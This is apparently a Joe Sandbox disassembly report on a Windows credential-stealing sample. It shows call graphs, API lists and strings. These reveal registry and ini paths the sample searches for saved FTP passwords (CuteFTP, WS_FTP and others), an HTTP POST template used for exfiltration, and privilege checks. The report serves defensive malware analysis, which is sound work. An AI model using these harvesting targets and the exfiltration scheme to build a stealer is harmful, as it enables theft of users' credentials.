                                        • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
                                        • API String ID: 1332880857-44262141
                                        • Opcode ID: df1eb648c298e9ec259796396ccae5e9430f32d9208ff850baed2ea8562c31e7
                                        • Instruction ID: 8e4f353a72aa291d62cd9fd792fc73201ed9e3ce88c61fdab07ab4323d85dcc7
                                        • Opcode Fuzzy Hash: df1eb648c298e9ec259796396ccae5e9430f32d9208ff850baed2ea8562c31e7
                                        • Instruction Fuzzy Hash: BE210A75680308BADF116A90CC06FDE7A76BB84B08F208067B514750E1DAB96AD5AF8C

                                        Control-flow Graph

                                        APIs
                                        • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 00402164
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 004021A4
                                        • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF), ref: 00402257
                                        • lstrlenA.KERNEL32(?,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000), ref: 00402290
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 004022C7
                                        • GetHGlobalFromStream.OLE32(?,?,?,?), ref: 004022F3
                                        • GlobalLock.KERNEL32(?), ref: 00402323
                                        • GlobalUnlock.KERNEL32(?), ref: 00402342
                                        • GetHGlobalFromStream.OLE32(?,?,?,?,?,?), ref: 00402354
                                        • GlobalLock.KERNEL32(?), ref: 00402384
                                        • GlobalUnlock.KERNEL32(?), ref: 004023A3
                                          • Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Global$FromLocalLockStreamUnlocklstrlen$AllocCloseEnumFreeOpen
                                        • String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                        • API String ID: 4234118056-981893429
                                        • Opcode ID: 1f3f8d0062e11a61bab0ff8ab5fe8b3f08d8182dde7c7ca9f8716c5caf8c2a4a
                                        • Instruction ID: d171737467ef451fc826e3d579c9997d64fcde793b4b3b382e0925c89acd1817
                                        • Opcode Fuzzy Hash: 1f3f8d0062e11a61bab0ff8ab5fe8b3f08d8182dde7c7ca9f8716c5caf8c2a4a
                                        • Instruction Fuzzy Hash: 8D615071800158BADF31AB61CD06BEA7679AF54348F1040FBB588B11E1D7BD5EC4AF68

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 218 4036c0-40374e call 40190b * 4 InternetCrackUrlA 227 403750-403754 218->227 228 403756 218->228 227->228 229 40375b-403779 InternetCreateUrlA 227->229 230 40388d-4038a8 call 4018f4 * 4 228->230 231 403780-4037bf InternetCrackUrlA 229->231 232 40377b 229->232 248 4038ad-4038b1 230->248 235 4037c1-4037c5 231->235 236 4037c7 231->236 232->230 235->236 238 4037cc-4037dc ObtainUserAgentString 235->238 236->230 240 4037fc-403817 wsprintfA 238->240 241 4037de-4037fa wsprintfA 238->241 243 40381a-40382b call 403003 240->243 241->243 249 40382d 243->249 250 40382f-403850 call 403692 lstrlenA call 403087 243->250 251 4038b3-4038b6 call 4018f4 248->251 252 4038bb-4038c0 248->252 249->230 258 403852 250->258 259 403854-403858 250->259 251->252 260 403885-403888 closesocket 258->260 261 40385a-403863 call 403087 259->261 262 40386e-403872 259->262 260->230 265 403868-40386a 261->265 262->260 264 403874-40387e call 40327b 262->264 268 403883 264->268 265->262 267 40386c 265->267 267->260 268->260
                                        APIs
                                          • Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919
                                        • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403747
                                        • InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403772
                                        • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 004037B8
                                        • ObtainUserAgentString.URLMON(00000000,?,00001000), ref: 004037D5
                                        • wsprintfA.USER32 ref: 004037F2
                                        • wsprintfA.USER32 ref: 00403812
                                          • Part of subcall function 00403692: setsockopt.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 004036B7
                                        • lstrlenA.KERNEL32(?,00001000,00001000,00001000,00001000), ref: 0040383D
                                        • closesocket.WSOCK32(?,?,00001000,00001000,00001000,00001000), ref: 00403888
                                        Strings
                                        • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0), xrefs: 004037FC
                                        • <, xrefs: 00403792
                                        • POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: %s, xrefs: 004037EA, 0040380A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$Crackwsprintf$AgentAllocCreateLocalObtainStringUserclosesocketlstrlensetsockopt
                                        • String ID: <$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: %s
                                        • API String ID: 963220733-2459402781
                                        • Opcode ID: e79ed7982b9715bd807d4a697f38f7c57ad1aa53513f8986cef2c93f6d550a38
                                        • Instruction ID: e96a955cf126575970a76a31bb9ed4e339ea21d969e4ba4c8af83a38dc8d532d
                                        • Opcode Fuzzy Hash: e79ed7982b9715bd807d4a697f38f7c57ad1aa53513f8986cef2c93f6d550a38
                                        • Instruction Fuzzy Hash: 215129B2D00209EADF11AFD1CC42BEDBFB9AF0434AF10803AF511B51A1DB795A55EB19

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 377 402c53-402c68 378 402c6a-402c6b 377->378 379 402c6c-402c74 377->379 380 402c76-402c7d 379->380 381 402c88-402c8c 379->381 380->381 382 402c7f-402c86 380->382 382->381 383 402c8d-402ca3 GetCurrentProcess OpenProcessToken 382->383 384 402d39-402d3d 383->384 385 402ca9-402cc5 GetTokenInformation 383->385 386 402d31-402d34 CloseHandle 385->386 387 402cc7-402ccf GetLastError 385->387 386->384 387->386 388 402cd1-402cd5 387->388 388->386 389 402cd7-402cf9 call 40190b GetTokenInformation 388->389 392 402d29-402d2c call 4018f4 389->392 393 402cfb-402d0d ConvertSidToStringSidA 389->393 392->386 393->392 395 402d0f-402d1e lstrcmpA 393->395 396 402d20 395->396 397 402d21-402d24 LocalFree 395->397 396->397 397->392
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: S-1-5-18
                                        • API String ID: 0-4289277601
                                        • Opcode ID: fecfbf39c9fa297d2a5b5898ffbabddf70c1d30136d3b9b2a810340c282c9ef3
                                        • Instruction ID: 42faedd81632fe65e7b373b3e490078558f195fb403373b35b5c805c479cc830
                                        • Opcode Fuzzy Hash: fecfbf39c9fa297d2a5b5898ffbabddf70c1d30136d3b9b2a810340c282c9ef3
                                        • Instruction Fuzzy Hash: 84218336900209BBEF119FE0DD8ABEE7B76AF40704F148576A511B51E1D7B98E90DB08

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 398 40695b-406978 RegOpenKeyA 399 406bdd-406bde 398->399 400 40697e 398->400 401 406985-4069ac RegEnumKeyExA 400->401 402 4069b3-406a71 call 401e34 call 401e88 call 401dad * 5 401->402 403 4069ae-406bd8 RegCloseKey 401->403 419 406a73-406a7a 402->419 420 406a86 402->420 403->399 419->420 421 406a7c-406a84 419->421 422 406a90-406ab5 call 4018f4 call 401dad 420->422 421->422 427 406ab7-406abe 422->427 428 406aca 422->428 427->428 429 406ac0-406ac8 427->429 430 406ad4-406ae1 call 4018f4 428->430 429->430 433 406b22-406b29 430->433 434 406ae3-406aea 430->434 436 406b96-406bd0 call 4018f4 * 5 433->436 437 406b2b-406b32 433->437 434->433 435 406aec-406b02 call 40465c 434->435 444 406b04-406b0b 435->444 445 406b0d-406b18 call 4018f4 435->445 436->401 437->436 440 406b34-406b3b 437->440 440->436 443 406b3d-406b91 call 4015a5 call 401607 * 2 call 4015db call 4015a5 call 401607 440->443 443->436 444->433 444->445 445->433
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00406971
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004069A5
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406BD8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: Host$InitialPath$Login$Password$PasswordType$Port
                                        • API String ID: 1332880857-4069465341
                                        • Opcode ID: 17a11e2314c8ff3581a4348192fce24d478644d80a43437b46957cdbfdb4abd3
                                        • Instruction ID: 563070ecf5fa897b10cbf2f3789db8db7108632a7b41965fe05ac691b7915a77
                                        • Opcode Fuzzy Hash: 17a11e2314c8ff3581a4348192fce24d478644d80a43437b46957cdbfdb4abd3
                                        • Instruction Fuzzy Hash: 20512871900128EADF21AB50CC05BDD7AB9BF44308F05C0FAA559700A1DB7A5EE6DF98

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 467 40d330-40d34a RegOpenKeyA 468 40d350 467->468 469 40d585-40d586 467->469 470 40d357-40d37e RegEnumKeyExA 468->470 471 40d380-40d580 RegCloseKey 470->471 472 40d385-40d41c call 401e34 * 2 call 4018f4 call 401dad * 4 470->472 471->469 488 40d437-40d439 472->488 489 40d41e-40d425 472->489 491 40d441 488->491 492 40d43b-40d43c call 4018f4 488->492 489->488 490 40d427-40d435 call 4018f4 489->490 495 40d44b-40d488 call 401dad * 2 490->495 491->495 492->491 501 40d522-40d578 call 4018f4 * 5 call 40d330 call 4018f4 495->501 502 40d48e-40d4a4 call 40465c 495->502 501->470 502->501 507 40d4a6-40d4aa 502->507 507->501 509 40d4ac-40d4b3 507->509 509->501 511 40d4b5-40d4bc 509->511 511->501 513 40d4be-40d51d call 4015a5 call 401607 * 2 call 4015db call 4015a5 call 401607 * 2 511->513 513->501
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D343
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D377
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D580
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
                                        • API String ID: 1332880857-2649023343
                                        • Opcode ID: 766aa626b9903119c8621182e70c04737db009e928439351e39ec2ae9a2bac56
                                        • Instruction ID: f73558341e8cd2c5acad615dfd7d92bae14253773d7b8338392588a4a47acccd
                                        • Opcode Fuzzy Hash: 766aa626b9903119c8621182e70c04737db009e928439351e39ec2ae9a2bac56
                                        • Instruction Fuzzy Hash: D651C871800118BADF226F91CC06BED7AB5BF04308F14C0BAB558740B1DB7A9B95AF99

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 536 407e82-407e9c RegOpenKeyA 537 407ea2 536->537 538 4080e4-4080e5 536->538 539 407ea9-407ed0 RegEnumKeyExA 537->539 540 407ed2-4080df RegCloseKey 539->540 541 407ed7-407f8a call 401e34 * 2 call 4018f4 call 401dad * 5 539->541 540->538 559 407fa5-407fa7 541->559 560 407f8c-407f93 541->560 562 407fa9-407faa call 4018f4 559->562 563 407faf 559->563 560->559 561 407f95-407fa3 call 4018f4 560->561 566 407fb9-407fe0 call 401dad 561->566 562->563 563->566 570 408081-4080d7 call 4018f4 * 5 call 407e82 call 4018f4 566->570 571 407fe6-407fed 566->571 570->539 571->570 573 407ff3-407ffa 571->573 573->570 575 408000-40805a call 4015a5 call 401607 * 3 call 4015a5 call 401607 573->575 600 408077-40807c call 4015a5 575->600 601 40805c-408063 575->601 600->570 601->600 603 408065-408075 call 4015a5 601->603 603->570
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407E95
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407EC9
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004080DF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
                                        • API String ID: 1332880857-3874328862
                                        • Opcode ID: 4e5f78b2082b0df1f2a02e6e644a2ec2b3394e2487fed211b8fb3d75f7ba774b
                                        • Instruction ID: d0f0f541ce44a27d8796f329589563cdb95c9df658d4ce2de4cac1fa5343e9e1
                                        • Opcode Fuzzy Hash: 4e5f78b2082b0df1f2a02e6e644a2ec2b3394e2487fed211b8fb3d75f7ba774b
                                        • Instruction Fuzzy Hash: 6D51C67180011CFADF22AB51CC06BDD7AB6BF44308F14C0BAB598750B1DF7A5A95AF89

                                        Control-flow Graph

                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DF33
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DF67
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040E150
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
                                        • API String ID: 1332880857-3620412361
                                        • Opcode ID: 285791bbc88e02000cb6d85d213c2cf2028e8e33a0b3a487e299f7c316149c85
                                        • Instruction ID: 0971a7c872fb0693c5352b9beac7b9fcdfa7a29398fb9dbefc689de0d8f0c08f
                                        • Opcode Fuzzy Hash: 285791bbc88e02000cb6d85d213c2cf2028e8e33a0b3a487e299f7c316149c85
                                        • Instruction Fuzzy Hash: 8751B93185011DBADF226F51CC02BDDBAB6BF44304F1484BAB558740B1DF7A9AA1AF88

                                        Control-flow Graph

                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004081E7
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040821B
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004083E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
                                        • API String ID: 1332880857-2128033141
                                        • Opcode ID: dab09581dcfefb29672388104fe7817e5414d593983262a8496b057c53f27703
                                        • Instruction ID: 6c51b123a90b80f2dcde880b9d7171a883e88705c8f9c7313780505028fc2e87
                                        • Opcode Fuzzy Hash: dab09581dcfefb29672388104fe7817e5414d593983262a8496b057c53f27703
                                        • Instruction Fuzzy Hash: C751843184011CFADF226F51CC02BDD7AB6BF44708F14C4BAB598740B1DE7A5AA1AF88

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 725 40272a-40274c RegCreateKeyA 726 402770-402772 725->726 727 40274e-402765 RegSetValueExA 725->727 730 402778-40278b GetTempPathA 726->730 731 40283d-402841 726->731 728 402767 727->728 729 402768-40276b RegCloseKey 727->729 728->729 729->726 730->731 732 402791-402796 730->732 732->731 733 40279c-4027b8 CreateDirectoryA call 4025f6 732->733 736 4027d6-4027e0 call 401e34 733->736 737 4027ba-4027d4 call 401e34 call 401e88 733->737 740 4027e5-402809 CreateFileA 736->740 737->740 742 402823-402825 740->742 743 40280b-40281e call 40145e CloseHandle 740->743 746 402832-402838 call 4018f4 742->746 747 402827-40282d DeleteFileA 742->747 743->742 746->731 747->746
                                        APIs
                                        • RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 00402745
                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 0040275E
                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 0040276B
                                        • GetTempPathA.KERNEL32(00000104,?), ref: 00402784
                                        • CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 004027A5
                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 00402800
                                        • CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 0040281E
                                        • DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 0040282D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Create$CloseFile$DeleteDirectoryHandlePathTempValue
                                        • String ID: Software\WinRAR
                                        • API String ID: 3443402316-224198155
                                        • Opcode ID: a05c4e0d96055550b35b99da67906f9fc971332be1f0c5d0b8d6447f5b377a02
                                        • Instruction ID: 048e6e6c718a24855db50cc86f6cfa04439d261174973b6e479fa67db8ac738a
                                        • Opcode Fuzzy Hash: a05c4e0d96055550b35b99da67906f9fc971332be1f0c5d0b8d6447f5b377a02
                                        • Instruction Fuzzy Hash: AC213076A4020CBADF21AAA0DD46FDE7A79AB24748F004076B614B50E1D6F99BD09B18
                                        APIs
                                          • Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040ECE8
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040ED1C
                                        • GetPrivateProfileStringA.KERNEL32(Program,DataPath,004141D6,?,00000104,00000000), ref: 0040EDA2
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EDFB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocCloseEnumLocalOpenPrivateProfileString
                                        • String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
                                        • API String ID: 1343824468-2495907966
                                        • Opcode ID: fbbdc39985ca6559bf2103e34e327bb4f1fea2f35acf94150543e805c75ad6b2
                                        • Instruction ID: d8426f1a6225f8b3ccd3b7369ce0e365b958f571d9854067f3528b96b9e63fdd
                                        • Opcode Fuzzy Hash: fbbdc39985ca6559bf2103e34e327bb4f1fea2f35acf94150543e805c75ad6b2
                                        • Instruction Fuzzy Hash: 46310B7194021DBADF11AB51CC02FDE7AB9BF00308F1084BBB554750E1DEB95AE1AF98

                                        Control-flow Graph

                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00405304
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
                                          • Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
                                          • Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C
                                        • GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,004141D6,?,00000104,?), ref: 00405354
                                        • GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,004141D6,?,00000104,?), ref: 0040538F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
                                        • String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
                                        • API String ID: 2508676433-45949541
                                        • Opcode ID: fd10845315201511baa03f0017f505fcc965452a29e01cd3687e276b7ce8d0c1
                                        • Instruction ID: 2f23723e329246ea37d19654ce7cddf11adee987441df0948eeec31433b87cf3
                                        • Opcode Fuzzy Hash: fd10845315201511baa03f0017f505fcc965452a29e01cd3687e276b7ce8d0c1
                                        • Instruction Fuzzy Hash: 88212171A806087ADF11BA61CC03FDE3669EF64744F10047B7A18B91E2D6FD9AD09E9C
                                        APIs
                                        • StrStrIA.SHLWAPI(00542E18,CUTEFTP), ref: 0040567F
                                          • Part of subcall function 00402469: lstrlenA.KERNEL32(?), ref: 0040247D
                                          • Part of subcall function 00402469: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040249C
                                          • Part of subcall function 00402469: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004024AE
                                          • Part of subcall function 00402469: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004024C0
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Strings
                                        • Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 004056E9
                                        • Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 00405710
                                        • Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 004056DC
                                        • CUTEFTP, xrefs: 00405679
                                        • Software\GlobalSCAPE\CuteFTP 9\QCToolbar, xrefs: 0040572A
                                        • Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 0040571D
                                        • Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 00405703
                                        • \sm.dat, xrefs: 00405693
                                        • Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 004056F6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$FreeLocal
